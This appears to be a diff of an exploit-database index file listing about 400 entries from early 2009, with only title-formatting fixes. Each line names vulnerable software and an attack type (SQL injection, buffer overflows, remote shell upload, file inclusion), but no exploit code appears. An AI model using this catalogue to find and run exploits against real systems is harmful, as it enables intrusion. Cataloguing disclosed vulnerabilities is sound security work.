7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability",2009-01-01,DaiMon,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 (.m3u File) Stack Buffer Overflow PoC",2009-01-01,"aBo MoHaMeD",windows,dos,0 @@ -7195,7 +7195,7 @@ id,file,description,date,author,platform,type,port 7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2",2009-01-04,sCORPINo,windows,local,0 7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #3",2009-01-04,Houssamix,windows,local,0 7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability",2009-01-04,StAkeR,php,webapps,0 -7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 +7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 (search) Remote SQL Injection Vulnerability",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability",2009-01-04,SuB-ZeRo,php,webapps,0 7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #4",2009-01-04,Stack,windows,local,0 @@ -7238,7 +7238,7 @@ id,file,description,date,author,platform,type,port 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0 7699,platforms/php/webapps/7699.txt,"QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-07,Moudi,php,webapps,0 7700,platforms/php/webapps/7700.php,"CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)",2009-01-08,StAkeR,php,webapps,0 -7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 Remote Heap Overflow Exploit (oldie but goodie)",2009-01-08,zuc,linux,remote,445 +7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow Exploit",2009-01-08,zuc,linux,remote,445 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 (.ASX File) Stack Overflow Exploit",2009-01-08,DATA_SNIPER,windows,local,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability",2009-01-08,IRCRASH,php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 @@ -7273,7 +7273,7 @@ id,file,description,date,author,platform,type,port 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 (language) Local File Inclusion Vulnerability",2009-01-11,Osirys,php,webapps,0 7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol (vcatid) SQL Injection Vulnerability",2009-01-12,H!tm@N,php,webapps,0 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum - Destroyer 0.1",2009-01-12,Xianur0,php,webapps,0 -7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= v6 Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 +7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 7738,platforms/php/webapps/7738.txt,"Wordpress plugin WP-Forum 1.7.8 Remote SQL Injection Vulnerability",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 @@ -7311,12 +7311,12 @@ id,file,description,date,author,platform,type,port 7771,platforms/asp/webapps/7771.txt,"DMXReady Job Listing <= 1.1 Remote Contents Change Vulnerability",2009-01-14,ajann,asp,webapps,0 7772,platforms/asp/webapps/7772.txt,"DMXReady Links Manager <= 1.1 Remote Contents Change Vulnerability",2009-01-14,ajann,asp,webapps,0 7773,platforms/asp/webapps/7773.txt,"DMXReady Member Directory Manager <= 1.1 SQL Injection Vulnerability",2009-01-14,ajann,asp,webapps,0 -7774,platforms/asp/webapps/7774.txt,"DMXReady Members Area Manager <= 1.2 SQL Injection Vulnerability",2009-01-14,ajann,asp,webapps,0 +7774,platforms/asp/webapps/7774.txt,"DMXReady Members Area Manager <= 1.2 SQL Injection Vulnerability",2009-01-14,ajann,asp,webapps,0 7775,platforms/php/webapps/7775.txt,"Joomla Component Camelcitydb2 2.2 SQL Injection Vulnerabilities",2009-01-14,H!tm@N,php,webapps,0 7776,platforms/hardware/dos/7776.c,"Cisco VLAN Trunking Protocol Denial of Service Exploit",2009-01-14,showrun,hardware,dos,0 7777,platforms/php/webapps/7777.txt,"Joomla Component Fantasytournament SQL Injection Vulnerabilities",2009-01-14,H!tm@N,php,webapps,0 7778,platforms/php/webapps/7778.txt,"phpList <= 2.10.8 Local File Inclusion Vulnerability",2009-01-14,BugReport.IR,php,webapps,0 -7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 Remote File Overwrite Exploit",2009-01-14,Houssamix,windows,remote,0 +7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 Remote File Overwrite Exploit",2009-01-14,Houssamix,windows,remote,0 7780,platforms/php/webapps/7780.pl,"phosheezy 2.0 Remote Command Execution Exploit",2009-01-14,Osirys,php,webapps,0 7781,platforms/multiple/remote/7781.txt,"Oracle Secure Backup 10g exec_qr() Command Injection Vulnerability",2009-01-14,"Joxean Koret",multiple,remote,0 7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager <= 1.1 Contents Change Vulnerability",2009-01-14,ajann,asp,webapps,0 @@ -7345,16 +7345,16 @@ id,file,description,date,author,platform,type,port 7805,platforms/php/webapps/7805.txt,"RankEm (DD/XSS/CM) Multiple Remote Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 7806,platforms/php/webapps/7806.txt,"BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 (Auth Bypass) SQL Injection Vulnerability",2009-01-16,SuB-ZeRo,asp,webapps,0 -7809,platforms/php/webapps/7809.txt,"Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 -7810,platforms/php/webapps/7810.txt,"Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 -7811,platforms/php/webapps/7811.txt,"Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 +7809,platforms/php/webapps/7809.txt,"Aj Classifieds - Real Estate 3.0 - Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 +7810,platforms/php/webapps/7810.txt,"Aj Classifieds - Personals 3.0 - Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 +7811,platforms/php/webapps/7811.txt,"Aj Classifieds - For Sale 3.0 - Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC",2009-01-16,sCORPINo,multiple,dos,0 7813,platforms/php/webapps/7813.txt,"Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 Multiple SQL Injection Vulnerabilities",2009-01-16,nuclear,php,webapps,0 7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x (id) SQL Injection Vulnerability",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN Database Disclosure Vulnerability",2009-01-18,Moudi,asp,webapps,0 7817,platforms/php/webapps/7817.txt,"Click&Email (Auth Bypass) SQL Injection Vulnerability",2009-01-18,SuB-ZeRo,php,webapps,0 -7818,platforms/php/webapps/7818.txt,"SCMS v1 (index.php p) Local File Inclusion Vulnerability",2009-01-18,ahmadbady,php,webapps,0 +7818,platforms/php/webapps/7818.txt,"SCMS 1 - (index.php p) Local File Inclusion Vulnerability",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability",2009-01-18,bd0rk,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 Remote Command Execution Exploit (mq = off)",2009-01-19,Osirys,php,webapps,0 @@ -7365,7 +7365,7 @@ id,file,description,date,author,platform,type,port 7827,platforms/windows/remote/7827.html,"SmartVmd ActiveX v 1.1 Remote File Deletion Exploit",2009-01-19,Houssamix,windows,remote,0 7828,platforms/php/webapps/7828.txt,"Joomla Component com_news SQL Injection Vulnerability",2009-01-19,Snakespc,php,webapps,0 7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 Admin Password Disclosure / Permanent XSS Vulns",2009-01-19,Osirys,php,webapps,0 -7830,platforms/php/webapps/7830.txt,"RCBlog v1.03 Authentication Bypass Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 +7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 7831,platforms/php/webapps/7831.txt,"Ninja Blog 4.8 Remote Information Disclosure Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 7832,platforms/php/webapps/7832.txt,"PHPAds 2.0 Multiple Remote Vulnerabilities",2009-01-19,"Danny Moules",php,webapps,0 7833,platforms/php/webapps/7833.php,"Joomla com_waticketsystem Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 @@ -7400,15 +7400,15 @@ id,file,description,date,author,platform,type,port 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability",2009-01-25,JiKo,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability",2009-01-25,fuzion,php,webapps,0 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 -7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 Version snv_101b Remote IPV6 Crash Exploit",2009-01-26,Kingcope,solaris,dos,0 -7866,platforms/php/webapps/7866.txt,"Simple Machines Forum <= 1.1.7 XSRF/XSS/Package Upload Vuln",2009-01-26,Xianur0,php,webapps,0 +7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 Version snv_101b Remote IPv6 Crash Exploit",2009-01-26,Kingcope,solaris,dos,0 +7866,platforms/php/webapps/7866.txt,"Simple Machines Forum <= 1.1.7 - CSRF/XSS/Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 (index.php id) Blind SQL Injection Exploit",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit",2009-01-26,Houssamix,windows,remote,0 7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX (Barcode.dll) Reamote Heap Overflow PoC",2009-01-26,Houssamix,windows,dos,0 7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 Insecure Method File Creation Exploit",2009-01-26,Stack,windows,remote,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem Auth Bypass / SQL Injection Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln",2009-01-26,k1n9k0ng,php,webapps,0 -7874,platforms/php/webapps/7874.txt,"SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability",2009-01-26,FeDeReR,php,webapps,0 +7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 (show_cat2.php grid) - SQL Injection Vulnerability",2009-01-26,FeDeReR,php,webapps,0 7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 (LIST) Remote Buffer Overflow Exploit (post-auth)",2009-01-26,"joe walko",windows,remote,21 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 (username) Blind SQL Injection Exploit",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software (userid) SQL Injection Vulnerability",2009-01-26,nuclear,php,webapps,0 @@ -7423,7 +7423,7 @@ id,file,description,date,author,platform,type,port 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 Multiple Local File Inclusion Vulnerabilities",2009-01-27,DSecRG,php,webapps,0 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 (PLS File) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 -7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 (gqmpeg File) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"GameScript 4.6 (XSS/SQL/LFI) Multiple Remote Vulnerabilities",2009-01-28,Encrypt3d.M!nd,php,webapps,0 @@ -7449,17 +7449,17 @@ id,file,description,date,author,platform,type,port 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 7916,platforms/php/webapps/7916.txt,"NetArtMedia Car Portal 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-01-29,"Mehmet Ince",php,webapps,0 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 beta 4.2 (login.php school) Blind SQL Injection Exploit",2009-01-29,darkjoker,php,webapps,0 -7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 XSRF/XSS Vulnerability",2009-01-29,"Michael Brooks",windows,remote,0 -7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 XSRF/XSS Vulnerabilities",2009-01-29,"Michael Brooks",windows,remote,0 -7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 -7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 XSRF Exploit",2009-01-29,"Michael Brooks",hardware,remote,0 -7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 +7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - CSRF/XSS Vulnerability",2009-01-29,"Michael Brooks",windows,remote,0 +7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - CSRF/XSS Vulnerabilities",2009-01-29,"Michael Brooks",windows,remote,0 +7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - XSS/CSRF Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 +7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - CSRF Exploit",2009-01-29,"Michael Brooks",hardware,remote,0 +7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - CSRF Protection Bypass and Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 (.m3u) Local Buffer Overflow Exploit",2009-01-29,SimO-s0fT,windows,local,0 7924,platforms/asp/webapps/7924.txt,"SalesCart (Auth Bypass) SQL Injection Vulnerability",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"ReVou Twitter Clone (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-30,nuclear,php,webapps,0 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 Remote SEH Overwrite Exploit",2009-01-30,LiquidWorm,windows,remote,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 -7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX v3 Null byte File Overwrite Vuln",2009-01-30,DSecRG,windows,remote,0 +7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null byte File Overwrite Vuln",2009-01-30,DSecRG,windows,remote,0 7929,platforms/windows/local/7929.c,"GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit",2009-01-30,Stack,windows,local,0 7930,platforms/php/webapps/7930.txt,"BPAutoSales 1.0.1 (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 (Topic) Remote XSS Vulnerability",2009-01-30,J-Hacker,php,webapps,0 @@ -7487,11 +7487,11 @@ id,file,description,date,author,platform,type,port 7955,platforms/php/webapps/7955.txt,"Groone's Guestbook 2.0 Remote File Inclusion Vulnerability",2009-02-03,"k3vin mitnick",php,webapps,0 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability",2009-02-03,x0r,php,webapps,0 7957,platforms/windows/local/7957.pl,"Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit",2009-02-03,SkD,windows,local,0 -7958,platforms/windows/local/7958.pl,"Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0 +7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forums (BBCode) Cookie Stealing Vulnerability",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 Remote Shell Upload Vulnerability",2009-02-03,"Hussin X",php,webapps,0 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0 -7962,platforms/windows/dos/7962.pl,"Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0 +7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS <= 2.6 Multiple Remote SQL Injection Vulnerabilities",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"Technote 7.2 Remote File Inclusion Vulnerability",2009-02-03,make0day,php,webapps,0 @@ -7502,10 +7502,10 @@ id,file,description,date,author,platform,type,port 7972,platforms/php/webapps/7972.py,"Openfiler 2.3 (Auth Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)",2009-02-04,"Single Eye",windows,local,0 -7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 +7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities",2009-02-04,fuzion,php,webapps,0 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability",2009-02-04,ahmadbady,php,webapps,0 -7978,platforms/php/webapps/7978.txt,"rgboard v4 5p1 (07.07.27) Multiple Remote Vulnerabilities",2009-02-04,make0day,php,webapps,0 +7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Remote Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 Multiple Remote File Inclusion Vulnerabilities",2009-02-04,make0day,php,webapps,0 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management (DD/XSS) Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 @@ -7535,8 +7535,8 @@ id,file,description,date,author,platform,type,port 8006,platforms/php/webapps/8006.txt,"Traidnt UP Version 1.0 Remote File Upload Vulnerability",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS <= 2.0 (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router DOS Vulnerability",2009-02-09,Rembrandt,hardware,dos,0 -8009,platforms/php/webapps/8009.pl,"w3bcms <= v3.5.0 Multiple Remote Vulnerabilities Exploit",2009-02-09,DNX,php,webapps,0 -8010,platforms/windows/local/8010.pl,"FeedDemon <=2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 +8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Remote Vulnerabilities Exploit",2009-02-09,DNX,php,webapps,0 +8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 (id) Remote SQL Injection Vulnerability",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 (JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 @@ -7560,7 +7560,7 @@ id,file,description,date,author,platform,type,port 8031,platforms/php/webapps/8031.pph,"q-news 2.0 Remote Command Execution Exploit",2009-02-10,Fireshot,php,webapps,0 8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 (user) Local File Inclusion Vulnerability",2009-02-10,x0r,php,webapps,0 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0 -8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0 +8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0 8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0 @@ -7569,7 +7569,7 @@ id,file,description,date,author,platform,type,port 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln",2009-02-11,"Dejan Levaja",windows,remote,0 8042,platforms/php/webapps/8042.txt,"Dacio's CMS 1.08 (XSS/SQL/DD) Multiple Remote Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 -8043,platforms/php/webapps/8043.pl,"Bloggeruniverse v2Beta (editcomments.php id) SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 +8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01(searchmatch.php) SQL Injection Vulnerability",2009-02-11,nuclear,php,webapps,0 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 (query) Remote SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 (viewer.php id) SQL Injection Vuln",2009-02-12,x0r,php,webapps,0 @@ -7584,7 +7584,7 @@ id,file,description,date,author,platform,type,port 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit",2009-02-16,Kingcope,freebsd,local,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0 8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0 -8059,platforms/windows/remote/8059.html,"GeoVision LiveX_v8200 ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0 +8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 8061,platforms/php/webapps/8061.pl,"simplePMS CMS <= 0.1.4 LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 @@ -7612,7 +7612,7 @@ id,file,description,date,author,platform,type,port 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability",2009-02-20,Pouya_Server,php,webapps,0 -8089,platforms/php/webapps/8089.pl,"Graugon Forum v1 (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 +8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit",2009-02-23,SkyLined,multiple,dos,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 (admin.php) No Authentication Vulnerability",2009-02-23,ahmadbady,php,webapps,0 @@ -7628,7 +7628,7 @@ id,file,description,date,author,platform,type,port 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 8104,platforms/php/webapps/8104.txt,"Qwerty CMS (id) Remote SQL Injection Vulnerability",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"pPIM 1.0 Multiple Remote Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 -8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router Get Request Denial of Service Vuln",2009-02-25,staticrez,hardware,dos,0 +8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service Vuln",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-02-25,ByALBAYX,asp,webapps,0 8108,platforms/osx/local/8108.c,"Apple MACOS X xnu <= 1228.x Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 